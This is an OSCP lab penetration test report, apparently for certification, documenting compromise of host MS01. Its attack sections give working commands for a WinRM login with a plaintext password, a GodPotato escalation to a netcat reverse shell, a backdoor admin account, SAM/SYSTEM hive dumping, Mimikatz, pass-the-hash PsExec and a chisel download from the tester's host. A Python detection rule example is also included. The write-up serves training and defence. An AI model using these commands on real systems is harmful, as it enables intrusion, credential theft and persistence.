Offensive Security
OSCP A Report
OSID: 57195594
leighlinr@gmail.com
September 25, 2025
v1.0
CONFIDENTIAL          1
Table of Contents
1 Offensive Security OSCP Lab Penetration Test Report ........ 3
    1.1 Objective ............................................... 3
    1.2 Lab Network ............................................. 3
    1.3 Identified Vulnerabilities .............................. 3
2 Lab Network ................................................... 4
    2.1 MS01.OSCP.EXAM (192.168.230.141) ........................ 4
        2.1.1 Initial Access .................................... 4
        2.1.2 Privilege Escalation .............................. 4
        2.1.3 Post-Exploitation ................................. 5
1 Offensive Security OSCP Lab Penetration Test Report
1.1 Objective
Leighlin Ramsay (57195594) was tasked with performing an internal penetration test against
Offensive Security Labs. An internal penetration test is a dedicated attack against internally connected
systems. The focus of this test is to perform attacks similar to those of a hacker and attempt to
infiltrate Offensive Security’s internal lab systems – the oscp.exam domain. Leighlin Ramsay’s
(57195594) overall objective was to evaluate the network, identify systems, and exploit flaws while
reporting the findings back to Offensive Security.
During the internal penetration test, several alarming vulnerabilities were identified on Offensive
Security’s network. Leighlin Ramsay (57195594) was able to gain access to multiple machines,
primarily due to missing patches and poor security configurations, and held administrative-level
access to multiple systems during the testing. All systems were successfully exploited and access
granted.
1.2 Lab Network
Offensive Security Complete Guide machines (alpha and beta) may not be included in your lab report,
they are for demonstration purposes only.
For more information regarding the Bonus Points requirements, please visit the following URL:
https://help.offensive-security.com/hc/en-us/articles/360040165632-OSCP-Exam-Guide
1.3 Identified Vulnerabilities
In the course of this penetration test, one Critical vulnerability was identified:
Target Name        IP                 CVSS   Page
MS01.OSCP.EXAM     192.168.230.141    9.9    4
2 Lab Network
2.1 MS01.OSCP.EXAM (192.168.230.141)
Score:    9.9 (Critical)
Vector:   CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H
2.1.1     Initial Access
MS01 — Initial Access
The initial foothold on MS01 was obtained by authenticating to Windows Remote Management
(WinRM) using valid user credentials for eric.wallows. With WinRM reachable from the assessment
host, a direct nxc winrm invocation established an interactive session as the target user, confirming
access without requiring exploit code. This method was chosen because it is reliable, low-noise, and
immediately yields a stable command channel suitable for subsequent local enumeration and
post-exploitation tasks.
Command(s) Executed
nxc winrm 192.168.230.141 -u eric.wallows -p 'EricLikesRunning800'
2.1.2     Privilege Escalation
MS01 — Privilege Escalation
After landing as eric.wallows, local privilege review showed the account possessed
SeImpersonatePrivilege, which enables token impersonation attacks in Windows service contexts. To
escalate, I executed GodPotato (NET4) to trigger an impersonation chain and spawn a SYSTEM
reverse shell via nc64.exe. The approach was selected because GodPotato is a practical,
well-understood method for converting SeImpersonatePrivilege into full administrative control when
the RPC endpoints and service configuration permit it. The reverse shell was caught on a controlled
listener, and a quick identity check (e.g., whoami) validated elevation to NT AUTHORITY\SYSTEM.
Exploit Steps
# Target side (as eric.wallows):
.\GodPotato-NET4.exe -cmd "C:\Users\eric.wallows\videos\nc64.exe 192.168.45.225 443 -e cmd.exe"
# Attacker side:
nc -lvnp 443
To preserve access during the testing window, I briefly added a local administrator account and placed
it into both Administrators and Remote Management Users. (If persistence is out of scope, omit
these steps and document the rationale; shown here strictly as captured activity.)
(Optional) Persistence
net user svc pwn123456$ /add
net localgroup "Administrators" svc /add
net localgroup "Remote Management Users" svc /add
2.1.3    Post-Exploitation
MS01 — Post-Exploitation
With SYSTEM-level control, I collected offline credential material by saving the SAM and SYSTEM
registry hives and exfiltrating them for analysis. This enables hash extraction without leaving
additional tooling resident on the target. The hives were then parsed with Impacket’s secretsdump.py
to recover local account hashes for later validation and potential lateral movement.
Hive Collection & Parsing
# On target (elevated via GodPotato):
.\GodPotato-NET4.exe -cmd "reg save HKLM\SAM C:\Users\eric.wallows\videos\sam"
.\GodPotato-NET4.exe -cmd "reg save HKLM\SYSTEM C:\Users\eric.wallows\videos\system"
# Exfiltrate:
download sam
download system
# Offline parse:
python3 secretsdump.py -sam sam -system system LOCAL
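From the defender's side, both the persistence activity in 2.1.2 (a local account created and then placed into Administrators and Remote Management Users) and the hive collection above (reg save of HKLM\SAM and HKLM\SYSTEM) leave distinctive traces in the Windows Security log. The following Python is an added example, not part of this report, that runs two detection rules over a small set of constructed sample events: the event IDs are the standard Security log IDs (4720 account created, 4732 member added to a local group, 4688 process creation), but the events and their simplified field names are constructed for the example, not a real capture.

```python
"""Detection rules for two patterns from the MS01 narrative (added example;
the events below are constructed, not report data).
  Rule 1: a local account created (4720) and then added (4732) to
          Administrators or Remote Management Users within a short window.
  Rule 2: reg.exe saving the SAM/SYSTEM/SECURITY hives (4688 command line).
"""
import re
from datetime import datetime, timedelta

PRIVILEGED_LOCAL_GROUPS = {"administrators", "remote management users"}
# Matches "reg save HKLM\SAM ...", "reg.exe save hklm\system ...", etc.
HIVE_SAVE_RE = re.compile(
    r"\breg(?:\.exe)?\s+save\s+hklm\\(sam|system|security)\b", re.IGNORECASE)

# Constructed sample events (not a real capture). Field names mirror the
# Security log fields in simplified form. Timestamps are ISO 8601.
SAMPLE_EVENTS = [
    {"ts": "2025-09-25T10:05:40", "id": 4720, "target_user": "svc", "subject": "eric.wallows"},
    {"ts": "2025-09-25T10:05:42", "id": 4732, "group": "Administrators", "member": "svc", "subject": "eric.wallows"},
    {"ts": "2025-09-25T10:05:43", "id": 4732, "group": "Remote Management Users", "member": "svc", "subject": "eric.wallows"},
    {"ts": "2025-09-25T10:09:01", "id": 4688, "subject": "SYSTEM", "cmdline": r"reg save HKLM\SAM C:\Users\eric.wallows\videos\sam"},
    {"ts": "2025-09-25T10:09:02", "id": 4688, "subject": "SYSTEM", "cmdline": r"reg save HKLM\SYSTEM C:\Users\eric.wallows\videos\system"},
    # Benign noise: a registry query, and a long-standing account (no recent 4720) being added to a group.
    {"ts": "2025-09-25T11:30:00", "id": 4688, "subject": "helpdesk", "cmdline": r"reg query HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion"},
    {"ts": "2025-09-25T12:00:00", "id": 4732, "group": "Administrators", "member": "svc_backup", "subject": "admin"},
]


def _when(event):
    return datetime.fromisoformat(event["ts"])


def detect_new_privileged_account(events, window=timedelta(minutes=10)):
    """Rule 1. Return (member, group, timestamp) for every privileged-group
    add that follows that member's own creation within `window`."""
    created = {e["target_user"].lower(): _when(e) for e in events if e["id"] == 4720}
    hits = []
    for e in events:
        if e["id"] != 4732 or e["group"].lower() not in PRIVILEGED_LOCAL_GROUPS:
            continue
        member = e["member"].lower()
        if member in created and timedelta(0) <= _when(e) - created[member] <= window:
            hits.append((member, e["group"], e["ts"]))
    return hits


def detect_hive_save(events):
    """Rule 2. Return (hive, subject, timestamp) for every reg save of a
    credential-bearing hive seen in a process-creation command line."""
    hits = []
    for e in events:
        if e["id"] != 4688:
            continue
        match = HIVE_SAVE_RE.search(e.get("cmdline", ""))
        if match:
            hits.append((match.group(1).upper(), e["subject"], e["ts"]))
    return hits


def run_rules(events=SAMPLE_EVENTS):
    """Run both rules and return their hits keyed by rule name."""
    return {
        "new_privileged_account": detect_new_privileged_account(events),
        "credential_hive_save": detect_hive_save(events),
    }


if __name__ == "__main__":
    for rule, hits in run_rules().items():
        print(rule)
        for hit in hits:
            print("   ", hit)
```

Rule 1 correlates on the account name rather than on the command line, so it fires whether the account is created with net user, PowerShell or an API call, and it ignores the svc_backup add because no matching 4720 precedes it. Rule 2 depends on command-line auditing being enabled for 4688; without it the hive save is only visible through the registry or file-system telemetry of an EDR.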
To validate administrative reach, I used a recovered Administrator hash with PsExec to obtain a
remote administrative shell against MS01 using the hostname. This confirmed that credential material
extracted from the host was functional for remote management interfaces.
Admin Reach Validation
python3 psexec.py "MS01/Administrator"@"ms01.oscp.exam" -debug -hashes ":HASHES"
For additional secrets, I ran Mimikatz in the elevated session to enumerate LSA secrets and
interactive logon credentials. During this step, a credential artifact for celia.almeda was observed in
sekurlsa::logonpasswords. This report intentionally does not include any activity that depends on
using that hash in the AD environment, as the cutoff is before the sentence “Celia.almeda’s hash works
in the AD network.”
Memory/Secrets Collection
.\mimikatz.exe
lsadump::secrets
sekurlsa::logonpasswords
I also prepared infrastructure for potential pivoting by staging a simple HTTP server and a chisel
reverse SOCKS5 endpoint on the attacker machine. This enables on-demand tunnel establishment
from the target toward the tester, without requiring inbound firewall changes on the internal network.
(Only preparation is documented here; client-side pivot steps and any AD use of credentials are
outside the permitted scope for this section.)
Pivot Prep (Staging)
# Attacker side:
python3 -m http.server 80
chisel server -p 7000 --reverse --socks5
# Target side:
curl http://192.168.45.225/chisel.exe -o c.exe
.\c.exe client 192.168.45.225:7000 R:socks
End of Report
This report was rendered by SysReptor with ♥